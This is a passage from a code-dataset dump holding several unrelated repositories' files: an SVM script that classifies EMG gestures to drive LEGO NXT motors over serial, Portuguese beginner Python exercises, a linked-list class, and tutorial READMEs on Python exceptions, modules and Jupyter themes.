NXT\r\nser=serial.Serial('COM12', 9600) #com9 prolific\r\n\r\n# session 1 loading data to variables lists\r\ns1g0=\"C:/Users/ece73/Desktop/recordings/session1/gesture0.txt\"\r\ns1g1=\"C:/Users/ece73/Desktop/recordings/session1/gesture1.txt\"\r\ns1g2=\"C:/Users/ece73/Desktop/recordings/session1/gesture2.txt\"\r\ns1g3=\"C:/Users/ece73/Desktop/recordings/session1/gesture3.txt\"\r\ns1g4=\"C:/Users/ece73/Desktop/recordings/session1/gesture4.txt\"\r\ns1g5=\"C:/Users/ece73/Desktop/recordings/session1/gesture5.txt\"\r\ns1g6=\"C:/Users/ece73/Desktop/recordings/session1/gesture6.txt\"\r\ns1g7=\"C:/Users/ece73/Desktop/recordings/session1/gesture7.txt\"\r\ns1g8=\"C:/Users/ece73/Desktop/recordings/session1/gesture8.txt\"\r\n\r\nds1g0 = np.loadtxt(s1g0, delimiter=\",\")\r\nds1g1 = np.loadtxt(s1g1, delimiter=\",\")\r\nds1g2 = np.loadtxt(s1g2, delimiter=\",\")\r\nds1g3 = np.loadtxt(s1g3, delimiter=\",\")\r\nds1g4 = np.loadtxt(s1g4, delimiter=\",\")\r\nds1g5 = np.loadtxt(s1g5, delimiter=\",\")\r\nds1g6 = np.loadtxt(s1g6, delimiter=\",\")\r\nds1g7 = np.loadtxt(s1g7, delimiter=\",\")\r\nds1g8 = np.loadtxt(s1g8, delimiter=\",\")\r\n###################################################\r\n\r\n# session 2 loading data to variables lists\r\ns2g0=\"C:/Users/ece73/Desktop/recordings/session2/gesture0.txt\"\r\ns2g1=\"C:/Users/ece73/Desktop/recordings/session2/gesture1.txt\"\r\ns2g2=\"C:/Users/ece73/Desktop/recordings/session2/gesture2.txt\"\r\ns2g3=\"C:/Users/ece73/Desktop/recordings/session2/gesture3.txt\"\r\ns2g4=\"C:/Users/ece73/Desktop/recordings/session2/gesture4.txt\"\r\ns2g5=\"C:/Users/ece73/Desktop/recordings/session2/gesture5.txt\"\r\ns2g6=\"C:/Users/ece73/Desktop/recordings/session2/gesture6.txt\"\r\ns2g7=\"C:/Users/ece73/Desktop/recordings/session2/gesture7.txt\"\r\ns2g8=\"C:/Users/ece73/Desktop/recordings/session2/gesture8.txt\"\r\n\r\nds2g0 = np.loadtxt(s2g0, delimiter=\",\")\r\nds2g1 = np.loadtxt(s2g1, delimiter=\",\")\r\nds2g2 = np.loadtxt(s2g2, delimiter=\",\")\r\nds2g3 = np.loadtxt(s2g3, delimiter=\",\")\r\nds2g4 = np.loadtxt(s2g4, delimiter=\",\")\r\nds2g5 = np.loadtxt(s2g5, delimiter=\",\")\r\nds2g6 = np.loadtxt(s2g6, delimiter=\",\")\r\nds2g7 = np.loadtxt(s2g7, delimiter=\",\")\r\nds2g8 = np.loadtxt(s2g8, delimiter=\",\")\r\n##################################################################\r\n\r\n# session 3 loading data to variables lists\r\ns3g0=\"C:/Users/ece73/Desktop/recordings/session3/gesture0.txt\"\r\ns3g1=\"C:/Users/ece73/Desktop/recordings/session3/gesture1.txt\"\r\ns3g2=\"C:/Users/ece73/Desktop/recordings/session3/gesture2.txt\"\r\ns3g3=\"C:/Users/ece73/Desktop/recordings/session3/gesture3.txt\"\r\ns3g4=\"C:/Users/ece73/Desktop/recordings/session3/gesture4.txt\"\r\ns3g5=\"C:/Users/ece73/Desktop/recordings/session3/gesture5.txt\"\r\ns3g6=\"C:/Users/ece73/Desktop/recordings/session3/gesture6.txt\"\r\ns3g7=\"C:/Users/ece73/Desktop/recordings/session3/gesture7.txt\"\r\ns3g8=\"C:/Users/ece73/Desktop/recordings/session3/gesture8.txt\"\r\n\r\nds3g0 = np.loadtxt(s3g0, delimiter=\",\")\r\nds3g1 = np.loadtxt(s3g1, delimiter=\",\")\r\nds3g2 = np.loadtxt(s3g2, delimiter=\",\")\r\nds3g3 = np.loadtxt(s3g3, delimiter=\",\")\r\nds3g4 = np.loadtxt(s3g4, delimiter=\",\")\r\nds3g5 = np.loadtxt(s3g5, delimiter=\",\")\r\nds3g6 = np.loadtxt(s3g6, delimiter=\",\")\r\nds3g7 = np.loadtxt(s3g7, delimiter=\",\")\r\nds3g8 = np.loadtxt(s3g8, delimiter=\",\")\r\n##################################################################\r\n\r\n# session 4 loading data to variables 
lists\r\ns4g0=\"C:/Users/ece73/Desktop/recordings/session4/gesture0.txt\"\r\ns4g1=\"C:/Users/ece73/Desktop/recordings/session4/gesture1.txt\"\r\ns4g2=\"C:/Users/ece73/Desktop/recordings/session4/gesture2.txt\"\r\ns4g3=\"C:/Users/ece73/Desktop/recordings/session4/gesture3.txt\"\r\ns4g4=\"C:/Users/ece73/Desktop/recordings/session4/gesture4.txt\"\r\ns4g5=\"C:/Users/ece73/Desktop/recordings/session4/gesture5.txt\"\r\ns4g6=\"C:/Users/ece73/Desktop/recordings/session4/gesture6.txt\"\r\ns4g7=\"C:/Users/ece73/Desktop/recordings/session4/gesture7.txt\"\r\ns4g8=\"C:/Users/ece73/Desktop/recordings/session4/gesture8.txt\"\r\n\r\nds4g0 = np.loadtxt(s4g0, delimiter=\",\")\r\nds4g1 = np.loadtxt(s4g1, delimiter=\",\")\r\nds4g2 = np.loadtxt(s4g2, delimiter=\",\")\r\nds4g3 = np.loadtxt(s4g3, delimiter=\",\")\r\nds4g4 = np.loadtxt(s4g4, delimiter=\",\")\r\nds4g5 = np.loadtxt(s4g5, delimiter=\",\")\r\nds4g6 = np.loadtxt(s4g6, delimiter=\",\")\r\nds4g7 = np.loadtxt(s4g7, delimiter=\",\")\r\nds4g8 = np.loadtxt(s4g8, delimiter=\",\")\r\n##################################################################\r\n\r\n# session 5 loading data to variables lists\r\ns5g0=\"C:/Users/ece73/Desktop/recordings/session5/gesture0.txt\"\r\ns5g1=\"C:/Users/ece73/Desktop/recordings/session5/gesture1.txt\"\r\ns5g2=\"C:/Users/ece73/Desktop/recordings/session5/gesture2.txt\"\r\ns5g3=\"C:/Users/ece73/Desktop/recordings/session5/gesture3.txt\"\r\ns5g4=\"C:/Users/ece73/Desktop/recordings/session5/gesture4.txt\"\r\ns5g5=\"C:/Users/ece73/Desktop/recordings/session5/gesture5.txt\"\r\ns5g6=\"C:/Users/ece73/Desktop/recordings/session5/gesture6.txt\"\r\ns5g7=\"C:/Users/ece73/Desktop/recordings/session5/gesture7.txt\"\r\ns5g8=\"C:/Users/ece73/Desktop/recordings/session5/gesture8.txt\"\r\n\r\nds5g0 = np.loadtxt(s5g0, delimiter=\",\")\r\nds5g1 = np.loadtxt(s5g1, delimiter=\",\")\r\nds5g2 = np.loadtxt(s5g2, delimiter=\",\")\r\nds5g3 = np.loadtxt(s5g3, delimiter=\",\")\r\nds5g4 = np.loadtxt(s5g4, delimiter=\",\")\r\nds5g5 = np.loadtxt(s5g5, delimiter=\",\")\r\nds5g6 = np.loadtxt(s5g6, delimiter=\",\")\r\nds5g7 = np.loadtxt(s5g7, delimiter=\",\")\r\nds5g8 = np.loadtxt(s5g8, delimiter=\",\")\r\n##################################################################\r\n\r\n# Creating y lists for the classification for every session and every gesture\r\n#session 1 gestures y matrices\r\nys1g0=[0 for i in range(len(ds1g0))]\r\nys1g1=[1 for i in range(len(ds1g1))]\r\nys1g2=[2 for i in range(len(ds1g2))]\r\nys1g3=[3 for i in range(len(ds1g3))]\r\nys1g4=[4 for i in range(len(ds1g4))]\r\nys1g5=[5 for i in range(len(ds1g5))]\r\nys1g6=[6 for i in range(len(ds1g6))]\r\nys1g7=[7 for i in range(len(ds1g7))]\r\nys1g8=[8 for i in range(len(ds1g8))]\r\n\r\n#session 2 gestures y matrices\r\nys2g0=[0 for i in range(len(ds2g0))]\r\nys2g1=[1 for i in range(len(ds2g1))]\r\nys2g2=[2 for i in range(len(ds2g2))]\r\nys2g3=[3 for i in range(len(ds2g3))]\r\nys2g4=[4 for i in range(len(ds2g4))]\r\nys2g5=[5 for i in range(len(ds2g5))]\r\nys2g6=[6 for i in range(len(ds2g6))]\r\nys2g7=[7 for i in range(len(ds2g7))]\r\nys2g8=[8 for i in range(len(ds2g8))]\r\n\r\n#session 3 gestures y matrices\r\nys3g0=[0 for i in range(len(ds3g0))]\r\nys3g1=[1 for i in range(len(ds3g1))]\r\nys3g2=[2 for i in range(len(ds3g2))]\r\nys3g3=[3 for i in range(len(ds3g3))]\r\nys3g4=[4 for i in range(len(ds3g4))]\r\nys3g5=[5 for i in range(len(ds3g5))]\r\nys3g6=[6 for i in range(len(ds3g6))]\r\nys3g7=[7 for i in range(len(ds3g7))]\r\nys3g8=[8 for i in range(len(ds3g8))]\r\n\r\n#session 4 gestures y 
matrices\r\nys4g0=[0 for i in range(len(ds4g0))]\r\nys4g1=[1 for i in range(len(ds4g1))]\r\nys4g2=[2 for i in range(len(ds4g2))]\r\nys4g3=[3 for i in range(len(ds4g3))]\r\nys4g4=[4 for i in range(len(ds4g4))]\r\nys4g5=[5 for i in range(len(ds4g5))]\r\nys4g6=[6 for i in range(len(ds4g6))]\r\nys4g7=[7 for i in range(len(ds4g7))]\r\nys4g8=[8 for i in range(len(ds4g8))]\r\n\r\n#session 5 gestures y matrices\r\nys5g0=[0 for i in range(len(ds5g0))]\r\nys5g1=[1 for i in range(len(ds5g1))]\r\nys5g2=[2 for i in range(len(ds5g2))]\r\nys5g3=[3 for i in range(len(ds5g3))]\r\nys5g4=[4 for i in range(len(ds5g4))]\r\nys5g5=[5 for i in range(len(ds5g5))]\r\nys5g6=[6 for i in range(len(ds5g6))]\r\nys5g7=[7 for i in range(len(ds5g7))]\r\nys5g8=[8 for i in range(len(ds5g8))]\r\n\r\n#creating a complete dataset with y matrices for every session. \r\n#session 1\r\nds1=np.concatenate((ds1g0,ds1g3,ds1g4,ds1g6,ds1g8))\r\nys1=np.concatenate((ys1g0,ys1g3,ys1g4,ys1g6,ys1g8))\r\n\r\n#session 2\r\nds2=np.concatenate((ds2g0,ds2g3,ds2g4,ds2g6,ds2g8))\r\nys2=np.concatenate((ys2g0,ys2g3,ys2g4,ys2g6,ys2g8))\r\n\r\n#session 3\r\nds3=np.concatenate((ds3g0,ds3g3,ds3g4,ds3g6,ds3g8))\r\nys3=np.concatenate((ys3g0,ys3g3,ys3g4,ys3g6,ys3g8))\r\n\r\n#session 4\r\nds4=np.concatenate((ds4g0,ds4g3,ds4g4,ds4g6,ds4g8))\r\nys4=np.concatenate((ys4g0,ys4g3,ys4g4,ys4g6,ys4g8))\r\n\r\n#session 5\r\nds5=np.concatenate((ds5g0,ds5g3,ds5g4,ds5g6,ds5g8))\r\nys5=np.concatenate((ys5g0,ys5g3,ys5g4,ys5g6,ys5g8))\r\n\r\n#Creating the input for SVM. Complete data (x matrix) and y matrices.\r\ndatall=np.concatenate((ds1,ds2,ds3,ds4,ds5))\r\nysall=np.concatenate((ys1,ys2,ys3,ys4,ys5))\r\n\r\ndata=datall\r\ny=ysall\r\n\r\n#splitting training and testng set randomly\r\n\r\n\r\n#scaling the data sets \r\nX_train, X_test, y_train, y_test = train_test_split(data, y, test_size=0.2, random_state=0)\r\nscaler = preprocessing.StandardScaler().fit(X_train)\r\nX_train_transformed = scaler.transform(X_train)\r\nX_test_transformed = scaler.transform(X_test)\r\n\r\n#SVM model traing and and testing the test set on it printing the results \r\n#care for the parameters they are taken from previous recordings\r\nmodel = SVC(kernel='rbf', C=512,gamma=0.125,decision_function_shape='ovr')\r\nmodel.fit(X_train_transformed,y_train)\r\ny_true, y_pred = y_test, model.predict(X_test_transformed)\r\nprint(classification_report(y_true, y_pred))\r\nprint('model trained')\r\n\r\n\r\n#reading rms vectors from microprocessors and deciding what the Nxt will do\r\n#5th byte is the motor\r\n#start motor on port A, 0x0D, 0x00, 0x80, 0x04, 0x00, 0x64, 0x07, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00\r\n#start motor on port B, 0x0D, 0x00, 0x80, 0x04, 0x01, 0x64, 0x07, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00\r\n#start motor on port C, 0x0D, 0x00, 0x80, 0x04, 0x02, 0x64, 0x07, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00\r\n#Stop motor on port A, 0x0C, 0x00, 0x00, 0x04, 0x00, 0x00, 0x07, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00\r\n#Stop motor on port B, 0x0C, 0x00, 0x00, 0x04, 0x01, 0x00, 0x07, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00\r\n#Stop motor on port C, 0x0C, 0x00, 0x00, 0x04, 0x02, 0x00, 0x07, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00\r\n#6th byte 0x64 for 50% power for anticlockwise direction and 0xCD for clockwise\r\n\r\nwhile True:\r\n x = ser.readline() #reading a series of bytes\r\n g=x.decode(\"ascii\") #decoding the byte to string\r\n g = np.fromstring( g, dtype=np.float, sep=',' ) #changing the string to an array of floats\r\n g=np.reshape(g,(1,-1)) #reshaping to 2d 
array \r\n print(g)\r\n g_transformed=scaler.transform(g) #normalizing vector with params from training set\r\n y_predg=model.predict(g_transformed) #predicting which gesture this is\r\n print(y_predg) #printing prediction for me to know\r\n \r\n #If gesture0 detected stop all motor movements\r\n if y_predg==0:\r\n #stop port A\r\n packet = bytearray([ 0x0C, 0x00, 0x00, 0x04, 0x00, 0x00, 0x07, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00])\r\n serout.write(packet)\r\n #stop port B\r\n packet = bytearray([ 0x0C, 0x00, 0x00, 0x04, 0x01, 0x00, 0x07, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00])\r\n serout.write(packet)\r\n #stop port C\r\n packet = bytearray([ 0x0C, 0x00, 0x00, 0x04, 0x02, 0x00, 0x07, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00])\r\n serout.write(packet)\r\n #if gesture 3 detected open hand\r\n if y_predg==3:\r\n #start port A anticlockwise\r\n packet = bytearray([ 0x0D, 0x00, 0x80, 0x04, 0x00, 0x32, 0x07, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00])\r\n serout.write(packet)\r\n #stop port B\r\n packet = bytearray([ 0x0C, 0x00, 0x00, 0x04, 0x01, 0x00, 0x07, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00])\r\n serout.write(packet)\r\n #if gesture 4 detected close hand\r\n if y_predg==4:\r\n #start port A anticlockwise\r\n packet = bytearray([ 0x0D, 0x00, 0x80, 0x04, 0x00, 0xCD, 0x07, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00])\r\n serout.write(packet)\r\n #stop port B\r\n packet = bytearray([ 0x0C, 0x00, 0x00, 0x04, 0x01, 0x00, 0x07, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00])\r\n serout.write(packet)\r\n #if gesture 6 detected go up \r\n if y_predg==6:\r\n #start port B clockwise\r\n packet = bytearray([ 0x0D, 0x00, 0x80, 0x04, 0x01, 0x32, 0x07, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00])\r\n serout.write(packet)\r\n #stop port A\r\n packet = bytearray([ 0x0C, 0x00, 0x00, 0x04, 0x00, 0x00, 0x07, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00])\r\n serout.write(packet)\r\n #if gesture 8 detected go down \r\n if y_predg==8:\r\n #start port B anticlockwise\r\n packet = bytearray([ 0x0D, 0x00, 0x80, 0x04, 0x01, 0xCD, 0x07, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00])\r\n serout.write(packet)\r\n #stop port A\r\n packet = bytearray([ 0x0C, 0x00, 0x00, 0x04, 0x00, 0x00, 0x07, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00])\r\n serout.write(packet)\r\n\r\n" } ]
4
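Editor's note: the file closing the record above uses a scale-then-classify pattern — a StandardScaler is fitted on the training split only, and that same fitted scaler is reused for the test split and for every live RMS vector before prediction. A minimal, self-contained sketch of that pattern follows; the synthetic `X`/`y` arrays are illustrative stand-ins, not the repository's recorded EMG data (only the RBF parameters are carried over from the file above).

```python
# Minimal sketch of the fit-scaler-on-train / transform-everything pattern used
# above. X and y are synthetic stand-ins for the recorded gesture features.
import numpy as np
from sklearn import preprocessing
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
from sklearn.metrics import classification_report

rng = np.random.default_rng(0)
X = rng.normal(size=(200, 8))        # 200 fake 8-channel RMS feature vectors
y = rng.integers(0, 5, size=200)     # 5 fake gesture labels

X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)
scaler = preprocessing.StandardScaler().fit(X_train)  # statistics from the training split only
model = SVC(kernel='rbf', C=512, gamma=0.125, decision_function_shape='ovr')
model.fit(scaler.transform(X_train), y_train)
print(classification_report(y_test, model.predict(scaler.transform(X_test)), zero_division=0))

# A live vector must pass through the *same* fitted scaler before predict():
live_vector = rng.normal(size=(1, 8))
print(model.predict(scaler.transform(live_vector)))
```

Fitting the scaler on the training split alone avoids leaking test statistics into the model, which is why the serial-read loop above calls `scaler.transform(g)` on each incoming vector instead of refitting.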
vmms16/Linguagens-de-programa-o
https://github.com/vmms16/Linguagens-de-programa-o
0eb583a7aa647c47f95f114c640a7f8fdb419200
b538e3687dfb4cda70d37294ce8d61cf71859063
cd9bc078529a20a44eba7ffc03fd592a33afe983
refs/heads/master
2020-03-12T18:34:13.114198
2018-04-26T11:18:38
2018-04-26T11:18:38
130,763,594
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4112149477005005, "alphanum_fraction": 0.4252336323261261, "avg_line_length": 29.571428298950195, "blob_id": "a47848d3fcb25713ffce09461cb2782eaca61036", "content_id": "9ba238fff7715aae6d2ff32d820a440202b79a2c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 428, "license_type": "no_license", "max_line_length": 73, "num_lines": 14, "path": "/Entrega 1/Exercicio-2-Estruturado - Vinicius Mateus Mendonça da Silva.py", "repo_name": "vmms16/Linguagens-de-programa-o", "src_encoding": "UTF-8", "text": "while True:\n print(\"____________________________________________________\")\n veiculo=input(\"Qual o tipo do seu veiculo?\\n1-Carro\\n2-Moto\\nTipo: \")\n\n if veiculo==str(1):\n print(\"Seu carro tem 4 rodas\")\n break\n elif veiculo==str(2):\n print(\"Sua moto tem 2 rodas\")\n break\n else:\n print(\"Indique um veiculo valido\")\n\n print(\"____________________________________________________\")\n" }, { "alpha_fraction": 0.48493149876594543, "alphanum_fraction": 0.4904109537601471, "avg_line_length": 23.909090042114258, "blob_id": "e5457f3f840593e3ebdc42bb9984276954439f5c", "content_id": "d4b2dcffff536a9b9b8a8dd728862869ca97d3a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1095, "license_type": "no_license", "max_line_length": 79, "num_lines": 44, "path": "/Entrega 1/Execicio-2-OO - Vinicius Mateus Mendonça da Silva.py", "repo_name": "vmms16/Linguagens-de-programa-o", "src_encoding": "UTF-8", "text": "class Veiculo:\n def __init__(self):\n self._numero_rodas=None\n\n def getNumeroRodas(self):\n return self._numero_rodas\n\n def setNumeroRodas(self, quantidade):\n self._numero_rodas=quantidade\n\n def printNumeroRodas(self):\n print(\"Seu veiculo tem %d roas\"%(self._numero_rodas))\n\nclass Carro(Veiculo):\n def __init__(self):\n Veiculo.__init__(self)\n self._numero_rodas=4\n\nclass Moto(Veiculo):\n def __init__(self):\n Veiculo.__init__(self)\n self._numero_rodas=2\n\n\ndef main():\n while True:\n print(\"____________________________________________________\")\n veiculo = input(\"Qual o tipo do seu veiculo?\\n1-Carro\\n2-Moto\\nTipo: \")\n\n if veiculo == str(1):\n carro=Carro()\n carro.printNumeroRodas()\n break\n elif veiculo == str(2):\n moto=Moto()\n moto.printNumeroRodas()\n break\n else:\n print(\"Indique um veiculo valido\")\n\n print(\"____________________________________________________\")\n\nif __name__==\"__main__\":\n main()" } ]
2
kkasra12/pythonClass981
https://github.com/kkasra12/pythonClass981
f5bd99b0bb757aaf32f279758778f2d7855b7323
f74d44242c343d82940deaa82280aceaa2b693b7
093888768bb18164e0cbd85aa63b0edaedb4fabf
refs/heads/master
2021-07-11T11:59:43.862034
2020-11-30T15:44:56
2020-11-30T15:44:56
225,092,556
3
0
null
null
null
null
null
[ { "alpha_fraction": 0.5870206356048584, "alphanum_fraction": 0.5946902632713318, "avg_line_length": 29.81818199157715, "blob_id": "15abf76136a1dabda91644ff50de98fb361b772d", "content_id": "6a74b9da9ef1e0fe69dff28d97f028bff394e33c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1695, "license_type": "no_license", "max_line_length": 58, "num_lines": 55, "path": "/Session9/Q0.py", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "class node:\n def __init__(self,data):\n self.data=data\n self.next=None\n self.previous=None\n def setNext(self,nextNode):\n if type(nextNode)!=type(self):\n raise Exception(\"nextNode is not node!!!\")\n self.next=nextNode\n nextNode.previous=self\n def setPrevious(self,previousNode):\n if type(previousNode)!=type(self):\n raise Exception(\"previousNode is not node!!!\")\n self.previous=previousNode\n previousNode.next=self\n def add(self,newNode):\n assert type(newNode)==type(self)\n newNode.setNext(self.next)\n self.setNext(newNode)\n def printToEnd(self):\n currentNode=self\n while currentNode!=None:\n print(currentNode.data,end=\" \")\n currentNode=currentNode.next\n print()\n def delete(self):\n self.next.setPrevious(self.previous)\n # self.previous.setNext(self.next)\n def root(self):\n currentNode=self\n while currentNode.previous!=None:\n currentNode=currentNode.previous\n return currentNode\n def __len__(self):\n currentNode=self\n counter=0\n while currentNode.previous!=None:\n currentNode=currentNode.previous\n counter+=1\n\n currentNode=self\n while currentNode.next!=None:\n currentNode=currentNode.next\n counter+=1\n counter+=1\n return counter\n\nif __name__ == '__main__':\n nodes=[node(i) for i in range(10)]\n for node_,nextNode in zip(nodes,nodes[1:]):\n node_.setNext(nextNode)\n nodes[0].printToEnd()\n nodes[4].add(node(4.5))\n nodes[0].printToEnd()\n print(\"g\",len(nodes[4]))\n" }, { "alpha_fraction": 0.6819120049476624, "alphanum_fraction": 0.6966809630393982, "avg_line_length": 24.807376861572266, "blob_id": "43705ba9125af68ad95d93ec6bc61ff94d4612c2", "content_id": "d1a4427931186a1e802305293d4da98a3ffab214", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6305, "license_type": "no_license", "max_line_length": 265, "num_lines": 244, "path": "/Session4/README.md", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "**QUESTION:** There is a list of points in Cartesian coordinates. Desired program should be able to count the number of rectangles that can be formed using those points. To simplify the question,a rectangle's edges are parallel with xor y coordinates. For instance:\n\n**Input**\n```\n0,0\n0,1\n0,2\n1,0\n1,1\n1,2\n```\n**output**\n```\n3\n```\n# Exception Handling\n\n#### Some Common Exceptions\n- **Exception** (this is what almost all the others are built off of)\n- **AttributeError** - Raised when an attribute reference or assignment fails.\n- **IOError** - Raised when an I/O operation (such as a `print` statement, the built-in `open()` function or a method of a file object) fails for an I/O-related reason, e.g.,\n“*file not found*” or “*disk full*”.\n- **ImportError** - Raised when an import statement fails to find the module definition or when a `from ... 
import` fails to find a name that is to be imported.\n- **IndexError** - Raised when a sequence subscript is out of range.\n- **KeyError** - Raised when a mapping (dictionary) key is not found in the set of existing keys.\n- **KeyboardInterrupt** - Raised when the user hits the interrupt key (normally\nControl-C or Delete).\n- **NameError** - Raised when a local or global name is not found.\n- **OSError** - Raised when a function returns a system-related error.\n- **SyntaxError** - Raised when the parser encounters a syntax error\n- **TypeError** - Raised when an operation or function is applied to an object of inappropriate type. The associated value is a string giving details about the type mismatch.\n- **ValueError** - Raised when a built-in operation or function receives an argument that has the right type but an inappropriate value, and the situation is not described by a more precise exception such as *IndexError*.\n- **ZeroDivisionError** - Raised when the second argument of a division or modulo operation is zero.\n\n#### try/except\n\n```python\ntry:\n print(1/0)\nexcept:\n print(\"Can not divide by zero :)\")\n```\n\n*to be more specified...*\n\n```python\ntry:\n print(1/0)\nexcept ZeroDivisionError:\n print(\"Can not divide by zero :)\")\n```\n\n**How to handle several exceptions?**\n\n```python\nnumDicts={\"zero\":0,\"one\":1,\n 'two':2,'three':3,\n 'four':4,'five':5,\n 'six':6,'seven':7,\n 'eight':8,'nine':9}\ntry:\n num1,num2=input(\"please give me two numbers to divide them: \").split(\" \")\n print(numDicts[num1]/numDicts[num2])\nexcept ZeroDivisionError:\n print(\"Can not divide by zero :)\")\nexcept KeyError:\n print(\"I do not understand that number\")\nexcept:\n print(\"Oops!!! smth bad happened :[\")\n```\n\n*or*\n\n```python\nnumDicts={\"zero\":0,\"one\":1,\n 'two':2,'three':3,\n 'four':4,'five':5,\n 'six':6,'seven':7,\n 'eight':8,'nine':9}\ntry:\n num1,num2=input(\"please give me two numbers to divide them: \").split(\" \")\n print(numDicts[num1]/numDicts[num2])\nexcept (ZeroDivisionError, KeyError):\n print(\"Please recheck what you entered :|\")\nexcept:\n print(\"Oops!!! 
smth bad happened :[\")\n```\n\n# Modules and Importing\n\n```python\nimport math\nprint(math.sqrt(4))\nprint(math.cos(0))\nprint(math.pi)\n```\n\n**QUESTION:** How to find all functions in a module ?\n\n#### Using from to import\n```python\nfrom math import sqrt\nprint(sqrt(4))\n# print(math.sqrt(4))\n# print(cos(60))\n# print(math.cos(60))\n# print(math.pi)\n```\n\n```python\nfrom math import sqrt,cos\nprint(sqrt(4))\n# print(math.sqrt(4))\nprint(cos(60))\n# print(math.cos(60))\n```\n\n```python\nfrom math import *\nprint(sqrt(4))\n# print(math.sqrt(4))\nprint(cos(60))\n# print(math.cos(60))\nprint(math.pi)\n```\n\n**How to change functions name?**\n\n```python\nimport tkinter as tk\n```\n\n```python\nfrom math import log as ln\nprint(ln(2.71828))\n```\n\n```python\nfrom math import log as ln,e as EulerNumber\nprint(ln(EulerNumber))\n```\n\n*lets have some fun...*\n```python\n>>> import this\nThe Zen of Python, by Tim Peters\n\nBeautiful is better than ugly.\nExplicit is better than implicit.\nSimple is better than complex.\nComplex is better than complicated.\nFlat is better than nested.\nSparse is better than dense.\nReadability counts.\nSpecial cases aren't special enough to break the rules.\nAlthough practicality beats purity.\nErrors should never pass silently.\nUnless explicitly silenced.\nIn the face of ambiguity, refuse the temptation to guess.\nThere should be one-- and preferably only one --obvious way to do it.\nAlthough that way may not be obvious at first unless you're Dutch.\nNow is better than never.\nAlthough never is often better than *right* now.\nIf the implementation is hard to explain, it's a bad idea.\nIf the implementation is easy to explain, it may be a good idea.\nNamespaces are one honking great idea -- let's do more of those!\n>>>\n```\n\n#### importing from non-global modules\n\nImagine there is a program which needs `func0` and `func1`. One simple architecture for this code can be like this:\n\n```Python\n# File name: run_me.py\ndef func0(a,b):\n pass\n\ndef func1():\n pass\n\ninput()\n# your main code goes here\nprint()\n```\n\n*or* it is much **better** to use modules and `import`\n\n```Python\n# File name: utilities.py\ndef func0(a,b):\n pass\n\ndef func1():\n pass\n```\n\n```Python\n# File name: run_me.py\nfrom utilities import func0,func1\ninput()\n# your main code goes here\nprint()\n```\n\n# if \\_\\_name__ == \"\\_\\_main__\":\n\nthink of the last example. It will be nice to have some test cases for `utilities.py`. 
Simply we can add some test lines at the end of `utilities.py`, but there is a problem.(!?)\n\nTo solve the problem, lets separate test cases which leads us to generate this file:\n```Python\n# File name: utilities_testCase.py\nfrom utilities import func0,func1\nprint(func0(\"aTest\",\"bTest\"))\nprint(func0(\"aAnotherTest\",\"bAnotherTest\"))\nprint(func1(\"aTest\",\"bTest\"))\nprint(func1(\"aAnotherTest\",\"bAnotherTest\"))\n```\n\n**now lets make our environment more tidy by deleting `utilities_testCase.py`:**\n\n```Python\n# File name: utilities.py\ndef func0(a,b):\n pass\n\ndef func1():\n pass\nif __name__ == '__main__':\n print(func0(\"aTest\",\"bTest\"))\n print(func0(\"aAnotherTest\",\"bAnotherTest\"))\n print(func1(\"aTest\",\"bTest\"))\n print(func1(\"aAnotherTest\",\"bAnotherTest\"))\n```\n*and also we have main file:*\n```Python\n# File name: run_me.py\nfrom utilities import func0,func1\ninput()\n# your main code goes here\nprint()\n```\n\n> NOTE: both files should be in the same folder.\n" }, { "alpha_fraction": 0.693473219871521, "alphanum_fraction": 0.7039626836776733, "avg_line_length": 17.255319595336914, "blob_id": "4e93a3e57b6139a3b74c214f192d7e6d51a6b4b1", "content_id": "2ffa5c81d528180bb001fc398f334eb3b80ec0bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 858, "license_type": "no_license", "max_line_length": 104, "num_lines": 47, "path": "/AnswersUntilSixthSession/README.md", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "# Some discovery around jupyter\n\n## Install Theme\n### 1. Istall the theme\n```bash\n$ pip install jupytertheme\n```\n### 2. Change the theme\nto see the list of available themes:\n```bash\n$ jt -l\nAvailable Themes:\n chesterish\n grade3\n gruvboxd\n gruvboxl\n monokai\n oceans16\n onedork\n solarizedd\n solarizedl\n```\nto change the theme:\n```bash\n$ jt -t monokai\n```\n## Install some extensions\n> See [doc](https://jupyter-contrib-nbextensions.readthedocs.io/en/latest/install.html) for this section\n\n### 1. Install the python package\n```bash\n$ pip install jupyter_contrib_nbextensions\n```\n*or...*\n```bash\n$ pip3 install jupyter_contrib_nbextensions --user\n```\n\n### 2. Install javascript and css files\n```bash\n$ jupyter contrib nbextension install --user\n```\n\n### 3. 
